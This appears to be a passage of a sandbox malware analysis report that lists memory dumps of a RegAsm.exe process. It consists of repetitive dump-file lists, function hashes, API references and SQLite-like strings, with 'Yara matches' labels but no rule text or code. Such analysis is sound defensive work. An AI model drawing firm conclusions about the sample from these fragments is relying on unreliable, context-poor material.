                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: %!.15g$-
                                                                                                                                                                                                                                        • API String ID: 0-583212262
                                                                                                                                                                                                                                        • Opcode ID: 220d9ce6afa77c81df34151e8282fe02043837f34619375c0d65a026b40c9c52
                                                                                                                                                                                                                                        • Instruction ID: a04db27b01ed6fb2bc5a3744806cc9a1d49e9ac8e3fce40b298f0c633b31c607
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 220d9ce6afa77c81df34151e8282fe02043837f34619375c0d65a026b40c9c52
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B9918871A083468FD304DF6CD89175AFBE0EBC8344F48492DE899CB351E7B9D9098B92
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: *$?
                                                                                                                                                                                                                                        • API String ID: 0-2367018687
                                                                                                                                                                                                                                        • Opcode ID: a36a1243ef2a44ce17b07d0c73322cc3c19ede39c6f5aa2c38aae362867366a1
                                                                                                                                                                                                                                        • Instruction ID: 2c56e8444dfe7eb5a7fa9c8c28bba4553f8e33faf8e7961576a1fbd8483d84b0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a36a1243ef2a44ce17b07d0c73322cc3c19ede39c6f5aa2c38aae362867366a1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C713670A083998FD3118F68C88471BBBE6EF85300F0E496DE8CD97761E775DA4587A2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: string or blob too big
                                                                                                                                                                                                                                        • API String ID: 0-2803948771
                                                                                                                                                                                                                                        • Opcode ID: 29d1cd72ab8af950f43026d6e4933df3b0eb577ec880b76230a8d1eeed200778
                                                                                                                                                                                                                                        • Instruction ID: 1845bf9635e2fd4210dfc8437452d88d1fa6067eb854caa595dbd1197317b6fd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29d1cd72ab8af950f43026d6e4933df3b0eb577ec880b76230a8d1eeed200778
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3415777A043414BF7108A28BC4179B7B969B51330F1C4A38E8DA936D3DA26E64AC396
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,?,?), ref: 0040689E
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 00406978
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                        • String ID: )k@
                                                                                                                                                                                                                                        • API String ID: 2574300362-940070785
                                                                                                                                                                                                                                        • Opcode ID: 6f71164811d6df8cda258bcf4f135a328c4db8ad1a51c5915c461280e51b821c
                                                                                                                                                                                                                                        • Instruction ID: c39d4b3fe26b647a66bf522e9f735de2ad8918ca6e8eb657aee87430fdef1d80
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f71164811d6df8cda258bcf4f135a328c4db8ad1a51c5915c461280e51b821c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69418EB17017059BDB20CF69D8807ABF3E8AF84315F1545BAD84EDB381E639E8258B54
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • delayed %dms for lock/sharing conflict at line %d, xrefs: 19C556D1
                                                                                                                                                                                                                                        • winDelete, xrefs: 19C5569C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
                                                                                                                                                                                                                                        • API String ID: 0-1405699761
                                                                                                                                                                                                                                        • Opcode ID: 1dc927e5970ca26472e1446857901d8b280e953c9a28de508e1ff8dd243c5f48
                                                                                                                                                                                                                                        • Instruction ID: 9de0ae6451b30804f4d374cafe02f40fd1ea03d08ffed343be3b4412c70a92b1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1dc927e5970ca26472e1446857901d8b280e953c9a28de508e1ff8dd243c5f48
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A13158B3F002E18BF7023AB8FCCC95A7758A7203A1F090522ED9BC23D1DE219444869A
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0040F905
                                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0040F956
                                                                                                                                                                                                                                          • Part of subcall function 0040F7A0: std::_Xinvalid_argument.LIBCPMT ref: 0040F7BA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Xinvalid_argumentstd::_$memcpy
                                                                                                                                                                                                                                        • String ID: string too long
                                                                                                                                                                                                                                        • API String ID: 2304785028-2556327735
                                                                                                                                                                                                                                        • Opcode ID: e85a922af9ebbab45aabda57f093e6fe58dac93bd2c7f3220933ca98c57c2012
                                                                                                                                                                                                                                        • Instruction ID: b5ddb5f07250de15edbe22c83bac0e8ada76cede5f33fbd1d3110154bac4181d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e85a922af9ebbab45aabda57f093e6fe58dac93bd2c7f3220933ca98c57c2012
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E631F9333106105BE734AE5CA880A6AF7E9EF95720B20493FF581D7BC0C7799C488399
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: string or blob too big
                                                                                                                                                                                                                                        • API String ID: 0-2803948771
                                                                                                                                                                                                                                        • Opcode ID: bb3bb62ba115b900f063bd2ea58cec3327fadd325374808097dfab39070f6c19
                                                                                                                                                                                                                                        • Instruction ID: 84b7570faa667f2d1cab09e0a2d2ff671590c8ffd116834c90a702bec8bbf61d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb3bb62ba115b900f063bd2ea58cec3327fadd325374808097dfab39070f6c19
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 933138B6B043249BF7004A14BC01B6677699B86334F2C42A9F8D76B3C3D667E857C2A5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: OsError 0x%lx (%lu)
                                                                                                                                                                                                                                        • API String ID: 0-3720535092
                                                                                                                                                                                                                                        • Opcode ID: c1ead4df8bbe95a14aa2210b09cdcff18fe002db2e231594e15683b51a64b114
                                                                                                                                                                                                                                        • Instruction ID: cca1b20cd9af2d57167071f3fbbd1be4a75785c707d6977b8f0ae98eb8c0f5e9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c1ead4df8bbe95a14aa2210b09cdcff18fe002db2e231594e15683b51a64b114
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 12218E71A003A1ABE603ABB4EC8CB5B37A8EF04395F184424FD49D1290DB31D910D792
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: F
                                                                                                                                                                                                                                        • API String ID: 0-1304234792
                                                                                                                                                                                                                                        • Opcode ID: 478fe74649534c8adcf26176d91d9affe8cf8cfdffb9e6b1b78e7428e7b165f0
                                                                                                                                                                                                                                        • Instruction ID: e23a37516ca0bf889d274e8fb956e11f4668d6577e2cc925ab3999ff06bd51d2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 478fe74649534c8adcf26176d91d9affe8cf8cfdffb9e6b1b78e7428e7b165f0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B61160B66083808FD704DF25D45175FBBE4AFD8214F98486EE88A87290EB74E548CB93
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0040F596
                                                                                                                                                                                                                                          • Part of subcall function 0041FC60: std::exception::exception.LIBCMT ref: 0041FC75
                                                                                                                                                                                                                                          • Part of subcall function 0041FC60: __CxxThrowException@8.LIBCMT ref: 0041FC8A
                                                                                                                                                                                                                                          • Part of subcall function 0041FC60: std::exception::exception.LIBCMT ref: 0041FC9B
                                                                                                                                                                                                                                        • memmove.MSVCRT ref: 0040F5CF
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • invalid string position, xrefs: 0040F591
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                                                                                                                                        • String ID: invalid string position
                                                                                                                                                                                                                                        • API String ID: 1659287814-1799206989
                                                                                                                                                                                                                                        • Opcode ID: bcf694971f287d0a7553bfea25672fbe8ca6af17fe9a7413021174007575ee50
                                                                                                                                                                                                                                        • Instruction ID: 53bf75527ab3bf274367aba823a209b8e3b66f0f9231be3ffe00ec12181ebe73
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bcf694971f287d0a7553bfea25672fbe8ca6af17fe9a7413021174007575ee50
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F01DB32310250ABD734CD6CED8095AB3EAEBD5710B24493FE185DBB82D674DC4A87D8
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • API call with %s database connection pointer, xrefs: 19C77220
                                                                                                                                                                                                                                        • invalid, xrefs: 19C7721B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: API call with %s database connection pointer$invalid
                                                                                                                                                                                                                                        • API String ID: 0-3574585026
                                                                                                                                                                                                                                        • Opcode ID: 51197203e43fffed98f023d23f2556617a05bb31a2a657cecd66170ba776b570
                                                                                                                                                                                                                                        • Instruction ID: 8e7dcf542a279d15886e0b2874227d470473acfa9e876d2d0af0169353a2818e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51197203e43fffed98f023d23f2556617a05bb31a2a657cecd66170ba776b570
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6EF0F672F06718CBDA145668FC14B9377DA5F40721F0D4555F5F6D27D2C220E454C291
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
